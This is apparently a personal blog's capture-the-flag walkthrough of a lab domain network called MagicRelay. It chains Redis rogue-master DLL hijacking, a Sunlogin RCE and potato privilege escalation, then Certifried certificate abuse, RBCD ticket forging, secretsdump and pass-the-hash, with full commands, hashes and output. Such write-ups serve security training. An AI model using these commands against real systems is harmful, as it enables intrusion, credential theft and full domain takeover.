fffffilm's learning

春秋云镜-MagicRelay

该文章更新于 2025.03.14
  1. 春秋云镜-MagicRelay
    1. flag01
    2. flag02
    3. flag04
    4. flag03

渗透

春秋云镜-MagicRelay

flag01

fscan 开梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
fscan -h 39.98.127.172

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.98.127.172:135 open
39.98.127.172:139 open
39.98.127.172:6379 open
[*] alive ports len is: 3
start vulscan
[*] NetInfo
[*]39.98.127.172
   [->]WIN-YUYAOX9Q
   [->]172.22.12.25
[+] Redis 39.98.127.172:6379 unauthorized file:C:\Program Files\Redis/dump.rdb

发现有一个redis服务,但是这是个windows靶机,利用条件太苛刻了。参考这篇文章踩坑记录-Redis(Windows)的getshell

image-20250309112240398

通过里面说到的工具进行无损写文件。r35tart/RedisWriteFile: 通过 Redis 主从写出无损文件

那么现在问题就来了,我们该写什么文件呢?没有web服务,且系统版本不对无法利用mof,启动项也不现实。就只能劫持dll了。

参考这篇文章:文章 - Windows Redis DLL劫持在实战中的利用 - 先知社区

先用P4r4d1se/dll_hijack这个项目生成一个dbgmain.dll

vs打开把里面的shellcode改成我们自己的,然后然后选择 Release x64 生成DLL文件

image-20250309112005460

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
root@dkhkY7buMr7kYt:~/tools/RedisWriteFile# python3 RedisWriteFile.py --rhost 39.98.127.172 --rport 6379 --lhost 156.238.233.55  --lport 8888 --rpath 'C:\\Program Files\\Redis\\' --rfile 'dbghelp.dll' --lfile 'dbghelp.dll'

______         _ _     _    _      _ _      ______ _ _      
| ___ \       | (_)   | |  | |    (_) |     |  ___(_) |     
| |_/ /___  __| |_ ___| |  | |_ __ _| |_ ___| |_   _| | ___ 
|    // _ \/ _` | / __| |/\| | '__| | __/ _ \  _| | | |/ _ \
| |\ \  __/ (_| | \__ \  /\  / |  | | ||  __/ |   | | |  __/
\_| \_\___|\__,_|_|___/\/  \/|_|  |_|\__\___\_|   |_|_|\___|     

                    Author : R3start   
          Reference : redis-rogue-server.py

[info] TARGET 39.98.127.172:6379
[info] SERVER 156.238.233.55:8888
[info] 连接恶意主服务器: 156.238.233.55:8888 
[info] 连接恶意主状态: +OK
 
[info] 设置写出路径为: C:\\Program Files\\Redis\\ 
[info] 设置写出路径状态: +OK
 
[info] 设置写出文件为: dbghelp.dll
[info] 设置写出文件状态: +OK
 
[info] 断开主从连接: +OK

[info] 恢复原始文件名: +OK

root@dkhkY7buMr7kYt:~/tools/RedisWriteFile# redis-cli -h 39.98.127.172
39.98.127.172:6379> bgsave
Background saving started

成功上线VSHELL,当然,这里也可以上线CS或者msf。看自己习惯用哪个

image-20250309171907871

image-20250309115201288

flag01: flag{58455a83-7516-4a8f-92bf-ca94e7aa33a0}

flag02

扫一下内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
fscan -h 172.22.12.25/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.12.6     is alive
(icmp) Target 172.22.12.12    is alive
(icmp) Target 172.22.12.25    is alive
(icmp) Target 172.22.12.31    is alive
[*] Icmp alive hosts len is: 4
172.22.12.6:88 open
172.22.12.25:6379 open
172.22.12.31:445 open
172.22.12.25:445 open
172.22.12.12:445 open
172.22.12.6:445 open
172.22.12.31:139 open
172.22.12.12:80 open
172.22.12.12:139 open
172.22.12.12:135 open
172.22.12.6:139 open
172.22.12.25:139 open
172.22.12.31:135 open
172.22.12.6:135 open
172.22.12.25:135 open
172.22.12.31:80 open
172.22.12.31:21 open
[*] alive ports len is: 17
start vulscan
[*] NetInfo
[*]172.22.12.25
   [->]WIN-YUYAOX9Q
   [->]172.22.12.25
[*] NetInfo
[*]172.22.12.31
   [->]WIN-IISQE3PC
   [->]172.22.12.31
[*] NetInfo
[*]172.22.12.12
   [->]WIN-AUTHORITY
   [->]172.22.12.12
[*] NetInfo
[*]172.22.12.6
   [->]WIN-SERVER
   [->]172.22.12.6
[*] NetBios 172.22.12.6     [+] DC:WIN-SERVER.xiaorang.lab       Windows Server 2016 Standard 14393
[*] NetBios 172.22.12.12    WIN-AUTHORITY.xiaorang.lab          Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.12.31    WORKGROUP\WIN-IISQE3PC
[*] OsInfo 172.22.12.6  (Windows Server 2016 Standard 14393)
[+] ftp 172.22.12.31:21:anonymous 
   [->]SunloginClient_11.0.0.33826_x64.exe
[*] WebTitle http://172.22.12.12       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.12.31       code:200 len:703    title:IIS Windows Server
[+] PocScan http://172.22.12.12 poc-yaml-active-directory-certsrv-detect 
[+] Redis 172.22.12.25:6379 unauthorized file:C:\Program Files\Redis/dump.rdb

看看内网里有什么

172.22.12.6 DC:WIN-SERVER.xiaorang.lab

172.22.12.12 WIN-AUTHORITY.xiaorang.lab

172.22.12.25 外网

172.22.12.31 WORKGROUP\WIN-IISQE3PC

发现31主机存在ftp匿名访问,并且里面有一个低版本的向日葵安装包。搜索发现正好存在一个rce漏洞Mr-xn/sunlogin_rce: 向日葵 RCE

先扫一下具体端口

1
xrkRce.exe -h 172.22.12.31  -t scan

image-20250309175329789

直接读flag了

1
2
xrkRce -h 172.22.12.31  -t rce -p 49686 -c "whoami"
xrkRce -h 172.22.12.31  -t rce -p 49686 -c "type "C:\Users\Administrator\flag\flag02.txt""

image-20250309181620846

flag02: flag{29a46b72-8a82-182a-45f3-532475ec6fd4}

flag04

发现存在SeImpersonatePrivilege特权,使用烂土豆提权拿到system权限,然后做域信息收集

image-20250309174514000

这里管理员访问不到域

image-20250309180333895

利用烂土豆提权到system,上线VSHELL

image-20250309180416006

现在就可以访问到了

image-20250309181135501

但是用bloodhound没看出什么东西来。回归之前的fscan扫描:

PocScan http://172.22.12.12 poc-yaml-active-directory-certsrv-detect。CVE-2022-26923 (Certifried) 解释

fscan扫描的时候发现CA服务器存在Active Directory 域权限提升漏洞,通过滥用 Active Directory 证书服务 (AD CS) 来请求具有任意攻击者控制的 DNS 主机名的计算机证书,这可以使域中的任何计算机帐户模拟域控制器,从而实现完全的域接管。

先拿到CA名字

image-20250309182507227

抓一个哈希出来

1
2
3
4
* Username : WIN-YUYAOX9Q$
* Domain   : XIAORANG
* NTLM     : e611213c6a712f9b18a8d056005a4f0f
* SHA1     : 1a8d2c95320592037c0fa583c1f62212d4ff8ce9

配置一下hosts

1
2
3
4
172.22.12.6 WIN-SERVER.xiaorang.lab
172.22.12.12 xiaorang-WIN-AUTHORITY-CA
172.22.12.6 xiaorang.lab
172.22.12.12 WIN-AUTHORITY.xiaorang.lab

利用这个哈希注册一个机器账号来充当域管

1
proxychains -q certipy-ad account create -u WIN-YUYAOX9Q$ -hashes e611213c6a712f9b18a8d056005a4f0f  -dc-ip 172.22.12.6 -user citrus -dns WIN-SERVER.xiaorang.lab -debug

image-20250309183029421

得到citrus$\DMlUxkWbuyfEQ3Rq

1
proxychains -q certipy-ad find -u 'citrus$@xiaorang.lab' -password 'DMlUxkWbuyfEQ3Rq' -dc-ip 172.22.12.6 -vulnerable -stdout

然后申请Machine证书(这里可能会超时,得执行两次

1
2
3
4
5
6
7
8
9
10
11
12
proxychains -q certipy-ad req -u 'citrus$@xiaorang.lab' -p 'DMlUxkWbuyfEQ3Rq' -ca 'xiaorang-WIN-AUTHORITY-CA' -target 172.22.12.12 -dc-ip 172.22.12.6 -template 'Machine' -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:172.22.12.12[\pipe\cert]
[+] Connected to endpoint: ncacn_np:172.22.12.12[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with DNS Host Name 'WIN-SERVER.xiaorang.lab'
[*] Certificate object SID is 'S-1-5-21-3745972894-1678056601-2622918667-1106'
[*] Saved certificate and private key to 'win-server.pfx'

然后拿域管哈希

1
proxychains -q certipy-ad auth -pfx win-server.pfx -dc-ip 172.22.12.6

报错了

image-20250309184102848

是因为获取的证书没有EKUPass the Certificate | The Hacker Recipes

1
2
certipy-ad cert -pfx win-server.pfx -nokey -out win-server.crt 
certipy-ad cert -pfx win-server.pfx -nocert -out win-server.key

通过passthecert.py将证书配置到域控的RBCD

1
2
3
4
5
6
7
proxychains -q python3 passthecert.py -action write_rbcd -crt win-server.crt -key win-server.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to 'win-server$' -delegate-from 'citrus$'

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] citrus$ can now impersonate users on win-server$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     citrus$      (S-1-5-21-3745972894-1678056601-2622918667-1106)

申请一张cifs服务的ST

1
proxychains -q impacket-getST xiaorang.lab/'citrus$':'DMlUxkWbuyfEQ3Rq' -spn cifs/win-server.xiaorang.lab -impersonate Administrator -dc-ip 172.22.12.6

image-20250309190228011

导入票据

1
export KRB5CCNAME=Administrator@cifs_win-server.xiaorang.lab@XIAORANG.LAB.ccache

打PTT

1
proxychains -q python3 psexec.py xiaorang.lab/administrator@win-server.xiaorang.lab -k -no-pass -target-ip 172.22.12.6 -codec gbk

image-20250309191033211

flag04: flag{4c7d6e81-3161-4853-b93f-349ab74a60e5}

flag03

利用ptt转储哈希

1
proxychains -q python3 secretsdump.py 'xiaorang.lab/administrator@win-server.xiaorang.lab' -target-ip 172.22.12.6 -no-pass -k

image-20250309194158116

有两个管理员,看看哪个是对的

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/Desktop/tools/impacket/examples]
└─# proxychains -q crackmapexec smb   172.22.12.12 -u 'administrator' -H 'd418e6aaeff1177bee5f84cf0466802c'
SMB         172.22.12.12    445    WIN-AUTHORITY    [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-AUTHORITY) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB         172.22.12.12    445    WIN-AUTHORITY    [-] xiaorang.lab\administrator:d418e6aaeff1177bee5f84cf0466802c STATUS_LOGON_FAILURE 

┌──(root㉿kali)-[~/Desktop/tools/impacket/examples]
└─# proxychains -q crackmapexec smb   172.22.12.12 -u 'administrator' -H 'aa95e708a5182931157a526acf769b13'
SMB         172.22.12.12    445    WIN-AUTHORITY    [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-AUTHORITY) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB         172.22.12.12    445    WIN-AUTHORITY    [+] xiaorang.lab\administrator:aa95e708a5182931157a526acf769b13 (Pwn3d!)

打PTH拿最后的flag

1
proxychains -q python3 wmiexec.py -hashes :aa95e708a5182931157a526acf769b13 xiaorang.lab/administrator@172.22.12.12 -codec gbk

image-20250309195018724

flag03: flag{317621a6-bb66-4154-b157-365c871d52d2}

参考文章

MagicRelay - C1trus

内网渗透—春秋云镜篇之2022网鼎杯-腾讯云开发者社区-腾讯云

文章 - Windows Redis DLL劫持在实战中的利用 - 先知社区

渗透